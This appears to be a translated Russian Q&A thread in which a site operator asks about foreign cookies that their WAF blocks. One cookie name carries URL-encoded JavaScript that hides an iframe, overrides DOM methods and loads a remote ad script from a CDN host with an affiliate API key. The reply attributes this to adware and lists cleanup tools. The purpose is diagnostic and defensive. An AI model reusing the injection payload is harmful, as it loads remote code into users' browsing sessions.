Иностранные куки в клиентских запросах

Question

Иностранные куки в клиентских запросах

Некоторые клиенты отправляют запросы в наше веб-приложение с помощью дополнительных файлов cookie, например:

vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false;  vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;

Наше приложение не устанавливает такие куки. Мы использовали некоторый внешний JavaScript, например, Google Analytics, но ни один из этих сценариев не делает этого. Наш сайт доступен только через HTTPS, поэтому изменение запроса MITM маловероятно.

Мы используем WAF, эти запросы заблокированы, а клиенты недовольны.

Я полагаю, что какое-то вредоносное расширение браузера пытается использовать уязвимость популярного веб-движка.

Кто-нибудь сталкивался с чем-нибудь подобным? Любые идеи о том, что делает это?

PS URL-адрес декодированного содержимого этого cookie-файла - это javascript, который, помимо прочего, содержит ссылку на http://yieldkit.com/legal-notes/terms-of-service/, но, вероятно, мошенники просто используют его для монетизации своих атак.

1

javascript malware web-application-firewall

Источник

user890863 14 июл '17 в 14:16

1 ответ

Другие вопросы по тегам javascript malware web-application-firewall

user890863 14 июл '17 в 15:27 2017-07-14 15:27 · Answer 1 · 2017-07-14 15:27

Нашел это. Эта вредоносная программа делает это: http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/ (статья на русском языке) и переведена с помощью Google Translate.

Краткое содержание:

Существует вредоносная программа, которая создает всплывающие рекламные окна с сайтом r.srvtrck.com для Chrome, Firefox и IE. Также он может интегрировать рекламу в открываемые вами сайты.

Чтобы удалить его, вы можете использовать:

Программа AdwCleaner
Malwarebytes Anti-вредоносная программа
сбросить настройки браузера
очистить *.lnk файлы с добавленного адреса сайта после запуска браузера
Программа AdGuard для блокировки рекламы (я бы не советовал, просто очистите свою систему и используйте AdBlock/uBlock)

Рекомендуется проверить планировщик заданий Windows на наличие нежелательных задач, которые периодически запускают браузер с адресом вредоносного сайта.